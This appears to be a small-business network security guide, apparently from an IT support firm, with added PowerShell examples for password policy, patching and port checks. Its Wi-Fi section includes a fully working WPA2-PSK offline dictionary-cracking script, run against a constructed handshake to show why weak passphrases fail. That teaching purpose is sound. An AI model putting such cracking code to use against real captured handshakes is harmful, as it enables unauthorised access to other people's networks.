With the business value of our networks, applications and data continually increasing, network security is an area that most businesses correctly identify as a priority. According to the PWC 2014 Information Security Breaches Survey, 60% of small businesses had a security breach in the last year, and the worst breach of the year cost the business £65k-£115k on average. Securing your systems can seem like a daunting task, but it needn’t be. Follow these simple steps to make your business computer systems more secure.
Enforce a strong password policy
We all know that strong passwords should be used to prevent unauthorised access to our computer systems. Yet there are still a surprising number of businesses that do not enforce this. Passwords such as “password” or the name of the business are still incredibly common on business networks.
Most desktop and network operating systems provide policy settings that enforce password length, complexity, history and expiry, and usually account lockout after repeated failed attempts; make sure these policies are set. If your business uses a Microsoft Windows domain, have your domain administrator set them once at the domain level so that every member computer inherits them; if you do not have a domain, the policy has to be set on each computer individually.
Automatic sign-in is almost as bad as having no password at all, even if a strong password policy is set, so disable it wherever possible. This matters most for devices such as laptops that are taken off-site and may be lost or stolen: whoever picks the machine up gets a logged-in session without ever knowing the password. If a computer genuinely requires automatic sign-in, harden it so that the automatically signed-in user is a low-privilege account that can do little damage. Get expert advice if necessary.
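Putting the policy steps above into practice on Windows, as an added example that is not code from the original article: the script sets the domain policy if the machine is domain-joined and the local policy otherwise, then disables automatic sign-in. The domain name corp.example.com and the numeric limits (14 characters, 24-password history, 90-day expiry, lockout after 10 failures) are assumptions chosen for the example; substitute your own.

```powershell
# Added example, not the original article's code. Run from an elevated
# PowerShell prompt. corp.example.com and all numeric limits are assumptions.
$domainName = 'corp.example.com'

if ((Get-CimInstance -ClassName Win32_ComputerSystem).PartOfDomain) {
    # Domain-joined: set the policy once at the domain level. Needs the RSAT
    # ActiveDirectory module and an account with Domain Admin rights.
    Import-Module ActiveDirectory
    Set-ADDefaultDomainPasswordPolicy -Identity $domainName `
        -MinPasswordLength 14 `
        -ComplexityEnabled $true `
        -PasswordHistoryCount 24 `
        -MaxPasswordAge (New-TimeSpan -Days 90) `
        -MinPasswordAge (New-TimeSpan -Days 1) `
        -LockoutThreshold 10 `
        -LockoutDuration (New-TimeSpan -Minutes 15) `
        -LockoutObservationWindow (New-TimeSpan -Minutes 15)
    Get-ADDefaultDomainPasswordPolicy -Identity $domainName   # show the result
}
else {
    # Stand-alone machine: this has to be repeated on every computer.
    # net accounts sets length, age, history and lockout ...
    net accounts /minpwlen:14 /maxpwage:90 /minpwage:1 /uniquepw:24 `
                 /lockoutthreshold:10 /lockoutduration:15 /lockoutwindow:15
    # ... but complexity lives in the local security policy, so export it,
    # flip PasswordComplexity and import it again (secedit writes UTF-16).
    $cfg = Join-Path $env:TEMP 'secpol.inf'
    secedit /export /cfg $cfg /areas SECURITYPOLICY | Out-Null
    (Get-Content $cfg) -replace '^PasswordComplexity\s*=\s*0', 'PasswordComplexity = 1' |
        Set-Content $cfg -Encoding Unicode
    secedit /configure /db "$env:windir\security\local.sdb" /cfg $cfg /areas SECURITYPOLICY | Out-Null
    Remove-Item $cfg
    net accounts   # prints the effective local policy so you can check it
}

# Disable automatic sign-in. With AutoAdminLogon=1 and DefaultPassword set,
# Windows logs the user in at boot without a prompt, so whoever holds a
# stolen laptop gets a live session. The password may instead be kept as an
# LSA secret (Sysinternals Autologon); setting AutoAdminLogon to 0 disables both.
$winlogon = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
Set-ItemProperty -Path $winlogon -Name AutoAdminLogon -Value '0'
Remove-ItemProperty -Path $winlogon -Name DefaultPassword -ErrorAction SilentlyContinue
```

Run it on one stand-alone machine first and read the output of the final net accounts call; if the numbers are not what you set, the machine is probably receiving a conflicting policy from elsewhere and that is what needs fixing, not the script.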
Restrict the use of generic accounts
Generic accounts are accounts set up for a specific purpose and shared by multiple people. They are inherently less secure than named accounts: several people know the credentials, the password is often simple and rarely changed so that everyone can remember it, and when something goes wrong there is no way to tell which person was using the account.
Wherever possible, give each user their own named credentials so that they, and only they, can access your systems with that account. Where a generic account is unavoidable, give it the bare minimum access rights needed for its function and apply the strong password policy to it. Restrict knowledge of the credentials to those who actually need the account, change the password whenever one of them leaves, and make them aware of the risks and consequences of the credentials falling into the wrong hands.
Update your operating systems and software regularly
Most attackers do not have the skill to find new security vulnerabilities in your software. It is far easier for them to wait for the vendor to release a patch, compare the patched and unpatched versions to identify the vulnerability it fixes, and work out how to exploit it on systems that have not yet applied the patch. For this reason, known vulnerabilities are a much greater threat than new ones, and you should ensure that all your systems are regularly updated with security patches.
Almost all operating system vendors and many application vendors provide automatic update functionality. All you need to do is make sure it is properly configured and check occasionally that it is still working. Configure automatic updates wherever possible, but take care with business-critical systems, because some updates change the behaviour of the software with unexpected results: test such updates on a non-critical machine first rather than switching updates off. If in doubt, get expert IT support advice.
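As an added example (not the article's own code), this turns automatic updates on by policy for Windows editions that honour Group Policy (Pro and above) and then performs the "check that it is still working" step: it reports the most recent update Windows has recorded and flags the machine if that is older than a threshold. The 30-day threshold is an assumption.

```powershell
# Added example, not the original article's code. Elevated prompt required.
# Policy keys honoured by Windows Update: NoAutoUpdate=0 keeps automatic
# updates on; AUOptions=4 means "download automatically and schedule the install".
$au = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU'
New-Item -Path $au -Force | Out-Null
Set-ItemProperty -Path $au -Name NoAutoUpdate -Value 0 -Type DWord
Set-ItemProperty -Path $au -Name AUOptions    -Value 4 -Type DWord

function Test-RecentlyPatched {
    param([int]$MaxDaysSinceUpdate = 30)   # threshold is an assumption
    # Get-HotFix lists the updates Windows has recorded; if the newest one is
    # older than the threshold, automatic updating has probably stalled.
    $latest = Get-HotFix |
        Where-Object { $_.InstalledOn } |
        Sort-Object InstalledOn -Descending |
        Select-Object -First 1
    $daysAgo = if ($latest) { [int]((Get-Date) - $latest.InstalledOn).TotalDays } else { -1 }
    [pscustomobject]@{
        ComputerName = $env:COMPUTERNAME
        LastHotFix   = if ($latest) { $latest.HotFixID } else { 'none recorded' }
        InstalledOn  = if ($latest) { $latest.InstalledOn } else { $null }
        DaysAgo      = $daysAgo
        Healthy      = ($null -ne $latest) -and ($daysAgo -le $MaxDaysSinceUpdate)
    }
}

# Run it here; on a domain you would run the same function on every member
# with Invoke-Command and chase the machines where Healthy is $false.
Test-RecentlyPatched
```

Get-HotFix only knows about updates that Windows itself recorded, so this says nothing about third-party software such as browsers, PDF readers or Java; those need their own update mechanism switched on and checked separately.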
Keep your anti-virus up-to-date
Internet threats continuously evolve and cybercriminals are always looking for new forms of attack and new ways into your systems. Yet many businesses, especially smaller ones, are surprisingly lax about keeping their anti-virus products up to date. In 2014, 45% of the small businesses surveyed by PWC suffered an infection by viruses or other malicious software. Updates protect you against the new threats that appear every day and improve your overall Internet security.
When you first install anti-virus software it protects you against the threats known at that point in time. After that, signature and engine updates are delivered over the Internet so that you receive them promptly. If your security software is not updating regularly, you are exposed to every threat that has appeared since your last update or initial installation, so check that updates are actually arriving rather than assuming they are.
Secure your network devices
Many routers, switches and wireless access points ship with standard, published default administrative credentials. If an intruder can establish the make and model of your device (often visible from the login page or the MAC address), the first thing they will try is the default username and password, so ensure that every network device has a non-default, strong password set.
For devices with an Internet-facing interface, such as your Internet router, ensure that no administrative ports are reachable on that interface: disable any “remote management” or “WAN administration” option and allow administration only from the internal interface. Remember that an Internet router with an open external administrative port and default credentials is an open door into your network.
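One check for the “no administrative ports on the Internet-facing interface” advice, as an added example rather than the article's own code: a small PowerShell probe of the common management ports on your router's public address. It must be run from outside your network, for instance over a phone hotspot, because from inside you would only be testing the LAN side. The address 203.0.113.10 is a documentation placeholder; substitute your own public IP.

```powershell
# Added example, not the original article's code. Run from OUTSIDE the office
# network; 203.0.113.10 is a placeholder for your own public address.
function Test-ExternalAdminPorts {
    param(
        [Parameter(Mandatory)][string]$PublicAddress,
        # Typical management services: FTP, SSH, Telnet, HTTP, HTTPS and the
        # alternative web ports many routers use. Extend as needed.
        [int[]]$Ports = @(21, 22, 23, 80, 443, 8080, 8443)
    )
    foreach ($port in $Ports) {
        # -InformationLevel Quiet reduces Test-NetConnection to $true/$false
        # (TCP connect only; it cannot see UDP services such as SNMP on 161).
        $open = Test-NetConnection -ComputerName $PublicAddress -Port $port `
                    -InformationLevel Quiet -WarningAction SilentlyContinue
        [pscustomobject]@{ Address = $PublicAddress; Port = $port; Open = $open }
    }
}

$results = Test-ExternalAdminPorts -PublicAddress '203.0.113.10'
$exposed = $results | Where-Object { $_.Open }
if ($exposed) {
    Write-Warning 'Ports answering on the Internet-facing interface:'
    $exposed | Format-Table -AutoSize
}
else {
    'No common management ports answer on the WAN side.'
}
```

A port that answers is not necessarily the router's own administration page: it may be a port-forward to an internal server, which deserves the same scrutiny. The result you want is that nothing in the list answers at all.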
Secure your wireless network
The first thing an intruder needs in order to get into your computer systems is access to your network. With the proliferation of business Wi-Fi networks this has become a lot easier: they no longer need physical access to your premises, they can simply park out front or sit in the coffee shop next door.
Protect your Wi-Fi network against unauthorised intrusion by securing it with encryption. WEP (Wired Equivalent Privacy) is an outdated and very weak algorithm that can be broken in minutes and should never be used; use WPA (Wi-Fi Protected Access) instead.
WPA comes in two flavours. The original WPA usually uses the TKIP cipher, a stop-gap built on the same RC4 basis as WEP that is now deprecated. WPA2 uses AES (CCMP), which is far stronger. Both, in the usual pre-shared key (PSK) mode, share one weakness: an attacker who records a single client joining the network can guess passphrases offline, as fast as their hardware allows, so short or dictionary-based passphrases are vulnerable under WPA2 just as under WPA. Some very old devices may not support WPA2, and on old access points without hardware AES support it can reduce throughput, but that is not a reason to stay on WPA.
Use WPA2 with AES encryption wherever possible, with a long, random passphrase (a dozen or more characters that are not a word or phrase anyone could guess). If forced to use WPA for an old device, use the same kind of passphrase and plan to replace the device. Do not use WEP under any circumstances.
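To make the passphrase point concrete, here is an added example (not the article's code) in which a constructed WPA2-PSK handshake is attacked offline with a wordlist, using the real PMK (PBKDF2-HMAC-SHA1 salted with the SSID), PTK (PRF-512) and MIC (HMAC-SHA1) derivations from the 802.11i standard. The SSID AcmeOffice, the MAC addresses, the nonces, the stand-in EAPOL frame, the “real” passphrase summer2014 and the wordlist are all constructed for the demo; nothing is captured from a real network. It runs on Windows PowerShell 5.1 or PowerShell 7.

```powershell
# Added example, not the original article's code. All handshake data below is
# constructed for the demo; nothing here came from a real network.

function Compare-Bytes([byte[]]$A, [byte[]]$B) {
    # Lexicographic compare, used to order MACs/nonces and to check the MIC.
    for ($i = 0; $i -lt $A.Length; $i++) {
        if ($A[$i] -ne $B[$i]) { return [int]$A[$i] - [int]$B[$i] }
    }
    return 0
}

function Get-WpaPmk([string]$Passphrase, [string]$Ssid) {
    # 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, salt = SSID, 4096 rounds, 32 bytes).
    # Nothing secret or per-session goes in, so the cost per guess is fixed.
    # (.NET insists on a salt of 8+ bytes, so this helper needs an SSID of 8+ chars.)
    $kdf = [Security.Cryptography.Rfc2898DeriveBytes]::new(
        $Passphrase, [Text.Encoding]::ASCII.GetBytes($Ssid), 4096)
    return $kdf.GetBytes(32)
}

function Get-WpaPtk([byte[]]$Pmk, [byte[]]$ApMac, [byte[]]$StaMac, [byte[]]$ANonce, [byte[]]$SNonce) {
    # PRF-512: HMAC-SHA1(PMK, "Pairwise key expansion" || 0x00 || min(MAC) || max(MAC)
    # || min(nonce) || max(nonce) || i) for i = 0..3, concatenated and cut to 64 bytes.
    $macs   = if ((Compare-Bytes $ApMac $StaMac) -lt 0) { $ApMac + $StaMac } else { $StaMac + $ApMac }
    $nonces = if ((Compare-Bytes $ANonce $SNonce) -lt 0) { $ANonce + $SNonce } else { $SNonce + $ANonce }
    $data   = [byte[]]($macs + $nonces)
    $label  = [Text.Encoding]::ASCII.GetBytes('Pairwise key expansion')
    $hmac   = [Security.Cryptography.HMACSHA1]::new($Pmk)
    $out    = @()
    foreach ($i in 0..3) {
        $out += $hmac.ComputeHash([byte[]]($label + [byte]0 + $data + [byte]$i))
    }
    return [byte[]]$out[0..63]   # bytes 0-15 are the KCK that authenticates the handshake
}

function Get-WpaMic([byte[]]$Kck, [byte[]]$EapolFrame) {
    # WPA2/CCMP (key descriptor version 2): MIC = HMAC-SHA1(KCK, frame with MIC zeroed)[0..15].
    # WPA/TKIP (version 1) uses HMAC-MD5 instead; the attack is otherwise identical.
    $hmac = [Security.Cryptography.HMACSHA1]::new($Kck)
    return [byte[]]($hmac.ComputeHash($EapolFrame)[0..15])
}

function Invoke-WpaDictionaryAttack([string]$Ssid, [byte[]]$ApMac, [byte[]]$StaMac,
        [byte[]]$ANonce, [byte[]]$SNonce, [byte[]]$EapolFrame, [byte[]]$CapturedMic, [string[]]$Wordlist) {
    # Everything needed was in the sniffed handshake; each guess costs one PBKDF2
    # run and never touches the access point, so lockouts and logging cannot help.
    $guesses = 0
    foreach ($candidate in $Wordlist) {
        $guesses++
        $ptk = Get-WpaPtk (Get-WpaPmk $candidate $Ssid) $ApMac $StaMac $ANonce $SNonce
        $mic = Get-WpaMic ([byte[]]$ptk[0..15]) $EapolFrame
        if ((Compare-Bytes $mic $CapturedMic) -eq 0) {
            return [pscustomobject]@{ Passphrase = $candidate; Guesses = $guesses }
        }
    }
    return $null
}

# --- Constructed "capture": what someone in the car park could have sniffed ---
$ssid   = 'AcmeOffice'
$apMac  = [byte[]](0x00, 0x11, 0x22, 0x33, 0x44, 0x55)
$staMac = [byte[]](0x66, 0x77, 0x88, 0x99, 0xAA, 0xBB)
$rng    = [Security.Cryptography.RandomNumberGenerator]::Create()
$aNonce = [byte[]]::new(32); $rng.GetBytes($aNonce)
$sNonce = [byte[]]::new(32); $rng.GetBytes($sNonce)
$eapol  = [byte[]]::new(121); $rng.GetBytes($eapol)   # stand-in for message 2, MIC field zeroed

# The legitimate client computes the MIC with the real (weak) passphrase; that
# value travels in clear over the air and is what the attacker records.
$realPassphrase = 'summer2014'
$victimPtk   = Get-WpaPtk (Get-WpaPmk $realPassphrase $ssid) $apMac $staMac $aNonce $sNonce
$capturedMic = Get-WpaMic ([byte[]]$victimPtk[0..15]) $eapol

$wordlist = @('password', 'letmein', 'AcmeOffice', 'welcome1', 'summer2014', 'qwerty123')
$hit = Invoke-WpaDictionaryAttack $ssid $apMac $staMac $aNonce $sNonce $eapol $capturedMic $wordlist
if ($hit) { "Recovered passphrase '$($hit.Passphrase)' after $($hit.Guesses) guesses" }
else      { 'Passphrase not in wordlist' }
```

The demo recovers summer2014 on the fifth guess. Real tools do exactly this against a real capture, only with wordlists of millions of entries and GPU acceleration; the only defence in PSK mode is a passphrase long and random enough not to be in any wordlist, which is why the cipher choice (WPA2/AES) and the passphrase choice are separate decisions. Note also that the SSID is the salt, so a default SSID such as the router model name lets an attacker reuse precomputed tables.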
Only allow trusted devices on your network
It is a simple matter for any computer with access to your network to scan the other devices on it for security vulnerabilities and unsecured assets, or to introduce malicious software, perhaps unintentionally. Make it company policy that only authorised and trusted devices under your control may connect to the business network.
It has become common for staff to bring their own devices (mobile phones, tablets and so on) to work and connect them to the work network, and you may also want to let clients, customers and business partners connect. If so, give these devices their own isolated network segment, often called a DMZ (demilitarised zone) or guest network: devices on it can reach the Internet as usual but cannot reach any of your internal IT systems. Be careful with the similarly named “DMZ host” option found on many consumer routers, which does the opposite: it forwards all unsolicited inbound Internet traffic to one internal device and should not be used for this.
Most modern firewalls and Internet routers have this built in: configure one of the LAN ports as the DMZ/guest segment and connect the guest network to that port. For an even simpler solution, some wireless routers (e.g. the TP-Link W8960N) offer a configurable ‘guest’ Wi-Fi network that is separate from your main Wi-Fi network and isolates guest traffic from it; where the option exists, also enable client isolation so that guest devices cannot see each other.
Carry out regular off-site backups
Security concerns are usually focused on preventing access to your systems, but you should give equal consideration to recovering lost data and restoring operations. It is not only malicious intrusion that you need to protect your systems against, but accidental loss and hardware failure too.
Backup and recovery strategy is a topic in itself and, depending on the operational nature of your business and the value and sensitivity of your data, solutions range from simple and inexpensive to very expensive and complex. A small business should, at the very least, take regular backups of its critical business data and store them off-site. With ever-increasing Internet bandwidth and ever-cheaper online storage, cloud-based backups have become viable for even the smallest business; a simple Internet search will throw up a host of providers. Whatever you choose, encrypt the data before it leaves your premises, and test a restore periodically: a backup that has never been restored is not yet a backup.
Raise IT awareness amongst your staff
Computer security is usually perceived as a technical challenge. In reality, one of the biggest threats to your IT systems is the human factor. Your staff use your computer systems every day to carry out their work, yet many have no formal IT training and no real understanding of the security implications of their actions. Read back through this article and you will see that almost every measure described here can be undone by a single careless user.
Raise IT awareness amongst your staff: make them aware of why they must not share their logon credentials or wireless passphrases with others, where to store data so that it will be securely backed up, which data is confidential or sensitive, and how to recognise and report suspicious e-mails and behaviour.
Ideally you would send all your business IT users on formal security training, but if that is cost-prohibitive then at least get a qualified member of staff to provide the essentials. Send out occasional security hints and tips to keep security at the front of people’s minds; even a link to this article covers a lot that most users would not otherwise be aware of.
Commission a security audit
Computer and IT security is a vast topic and far too extensive to cover in its entirety here. If security is a genuine concern for your business then it is worth spending a little money on a comprehensive third-party audit of your entire network to check for security holes and vulnerabilities.
Contact us to find out more.